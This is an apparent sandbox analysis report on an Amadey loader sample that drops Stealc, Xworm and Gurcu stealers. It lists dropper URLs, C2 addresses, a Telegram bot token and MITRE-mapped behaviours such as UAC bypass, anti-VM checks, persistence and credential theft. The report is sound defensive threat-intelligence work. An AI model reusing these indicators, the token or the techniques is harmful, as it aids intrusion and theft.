amadey | 019dd6f3c1f21ae590c9749ac0fc305fda223d6fc123ec9b236844f8efbd357f

Analysis

max time kernel
55s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-11-2024 01:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe
Size

1.8MB
MD5

ae0e62a9ae1f471958341b45817b6804
SHA1

e13376d4bdb2e56751dc4c52d9ad24ed55d72877
SHA256

9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb
SHA512

50d4eb6392626e7a337104e00eb819767f051bbe8975555b1621c88af4f1fc1d1f0b44360c94de00f7bd20d2590964d3fedac79c0bef9b334b934c87d19c2a83
SSDEEP

49152:j++S/0Cfy6rIyGFA0F8yU/qfb7u5CpRvSM/TG:y+89yxyGrdVfcCpRlK

Score

10^/10

amadey gurcu stealc xworm 9c9aa5 mars collection credential_access discovery evasion execution persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language

hta

Source

URLs

hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://176.113.115.178/FF/1.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

xworm

87.120.112.33:8398

Attributes

Install_directory
%LocalAppData%
install_file
svchost.exe
telegram
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579

Extracted

Family

stealc

Botnet

mars

http://185.215.113.206

Attributes

url_path
/c4becf79229cb002.php

Extracted

Family

gurcu

https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000a000000023b95-4828.dat	family_xworm
behavioral2/memory/5920-6220-0x0000000000D50000-0x0000000000D68000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8214b4dbe2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c145410f7e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5948d66f9b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
19	4884	powershell.exe
20	2288	powershell.exe
22	3888	mshta.exe
24	3380	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Run Powershell to execute payload.

execution

PowerShell

T1059.001

pid	Process
6664	powershell.exe
5696	powershell.exe
2220	powershell.exe
1552	powershell.exe
2288	powershell.exe
4884	powershell.exe
3380	powershell.exe
5696	powershell.exe
7160	powershell.exe
6460	powershell.exe
5832	powershell.exe
4208	powershell.exe
6352	powershell.exe
3496	powershell.exe
4676	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 4 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
440	chrome.exe
1064	chrome.exe
4808	chrome.exe
5984	chrome.exe

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c145410f7e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8214b4dbe2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c145410f7e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5948d66f9b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8214b4dbe2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5948d66f9b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	LB31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	LB31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Mig.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Mig.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	document.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	document.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	document.exe

Executes dropped EXE 14 IoCs

pid	Process
1004	skotes.exe
4384	file.exe
6864	FunnyJellyfish.exe
6912	FunnyJellyfish.tmp
5920	document.exe
6096	FunnyJellyfish.exe
6140	FunnyJellyfish.tmp
2232	8214b4dbe2.exe
1300	c145410f7e.exe
1432	5948d66f9b.exe
6104	d930301bec.exe
4344	LB31.exe
3464	Mig.exe
6712	skotes.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine	8214b4dbe2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine	c145410f7e.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine	5948d66f9b.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine	skotes.exe

Loads dropped DLL 2 IoCs

pid	Process
2616	regsvr32.exe
4128	regsvr32.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\svchost.exe"	document.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c145410f7e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008073001\\c145410f7e.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5948d66f9b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008074001\\5948d66f9b.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d930301bec.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008075001\\d930301bec.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2980	powercfg.exe
5912	powercfg.exe
6600	powercfg.exe
6496	powercfg.exe
3696	powercfg.exe
6368	powercfg.exe
4580	powercfg.exe
5172	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000b000000023bb1-8244.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Mig.exe
File opened for modification	C:\Windows\system32\MRT.exe	LB31.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
2756	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe
1004	skotes.exe
2232	8214b4dbe2.exe
1300	c145410f7e.exe
1432	5948d66f9b.exe
6712	skotes.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4884 set thread context of 2312	4884	powershell.exe	97
PID 4344 set thread context of 6048	4344	LB31.exe	156

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File created	C:\Windows\Tasks\skotes.job	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1464	sc.exe
1468	sc.exe
440	sc.exe
3260	sc.exe
7124	sc.exe
6032	sc.exe
6300	sc.exe
5548	sc.exe
6132	sc.exe
1184	sc.exe
4156	sc.exe
3928	sc.exe
6088	sc.exe
7060	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
7148	2232	WerFault.exe	128

System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8214b4dbe2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5948d66f9b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FunnyJellyfish.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FunnyJellyfish.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c145410f7e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FunnyJellyfish.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FunnyJellyfish.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d930301bec.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	8214b4dbe2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	8214b4dbe2.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6980	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1496	ipconfig.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
1504	taskkill.exe
6172	taskkill.exe
2808	taskkill.exe
4440	taskkill.exe
3768	taskkill.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
